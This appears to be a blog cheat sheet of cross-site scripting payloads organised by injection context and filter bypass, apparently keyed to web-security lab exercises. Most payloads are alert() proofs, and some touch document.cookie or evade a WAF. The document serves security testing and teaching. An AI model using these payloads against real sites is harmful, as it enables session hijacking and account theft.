When testing for reflected and stored XSS, a key task is to identify the XSS context:
a) The location within the response where attacker-controllable data appears.
b) Any input validation or other processing that is being performed on that data by the application.
Based on these details, you can then select one or more candidate XSS payloads, and test whether they are effective.
1. Reflected XSS into HTML context with nothing encoded:
<script>alert(1)</script>
<script>alert(document.domain)</script>
<img src=1 onerror=alert(1)>
2. Stored XSS into HTML context with nothing encoded:
<script>alert(1)</script>
3. Reflected XSS into HTML context with most tags and attributes blocked:
%22%3E%3Cbody%20onresize=alert(document.cookie)%3E"
4. Reflected XSS into HTML context with all tags blocked except custom ones:
%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
5. Reflected XSS with event handlers and href attributes blocked:
%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
6. Reflected XSS with some SVG markup allowed:
%22%3E%3Csvg%3E%3Cdiscard%20onbegin=alert(1)%3E
7. When the XSS context is into an HTML tag attribute value, you might sometimes be able to terminate the attribute value, close the tag, and introduce a new one:
"><script>alert(document.domain)</script>
8. When angle brackets are blocked or encoded:
" autofocus onfocus=alert(document.domain) x="
9. Reflected XSS into attribute with angle brackets HTML-encoded:
"onmouseover="alert(1)
10. Stored XSS into anchor href attribute with double quotes HTML-encoded:
javascript:alert(1)
<a href="javascript:alert(document.domain)">
11. Reflected XSS in canonical link tag:
%27accesskey=%27x%27onclick=%27alert(1)
12. When the XSS context is some existing JavaScript within the response. In the simplest case, it is possible to simply close the script tag that is enclosing the existing JavaScript, and introduce some new HTML tags that will trigger execution of JavaScript:
</script><img src=1 onerror=alert(document.domain)>
13. Reflected XSS into a JavaScript string with angle brackets HTML encoded:
'-alert(1)-'
'-alert(document.domain)-'
';alert(document.domain)//
14. Reflected XSS into a JavaScript string with single quote and backslash escaped:
test'payload
</script><script>alert(1)</script>
15. Some applications attempt to prevent input from breaking out of the JavaScript string by escaping any single quote characters with a backslash. A backslash before a character tells the JavaScript parser that the character should be interpreted literally, and not as a special character such as a string terminator. In this situation, applications often make the mistake of failing to escape the backslash character itself. This means that an attacker can use their own backslash character to neutralize the backslash that is added by the application:
';alert(document.domain)//
gets converted to:
\';alert(document.domain)//
You can now use the alternative payload:
\';alert(document.domain)//
which gets converted to:
\\';alert(document.domain)//
16. Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped:
test'payload
test\payload
\'-alert(1)//
17. Reflected XSS in a JavaScript URL with some characters blocked, Bypass WAF:
onerror=alert;throw 1
5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
18. Making use of HTML-encoding
When the XSS context is some existing JavaScript within a quoted tag attribute, such as an event handler, it is possible to make use of HTML-encoding to work around some input filters:
'-alert(document.domain)-'
19. Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped:
http://foo?'-alert(1)-'
20. Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped:
JavaScript template literals are string literals that allow embedded JavaScript expressions. The embedded expressions are evaluated and are normally concatenated into the surrounding text. Template literals are encapsulated in backticks instead of normal quotation marks, and embedded expressions are identified using the ${...} syntax.
${alert(document.domain)}
${alert(1)}
0 Comments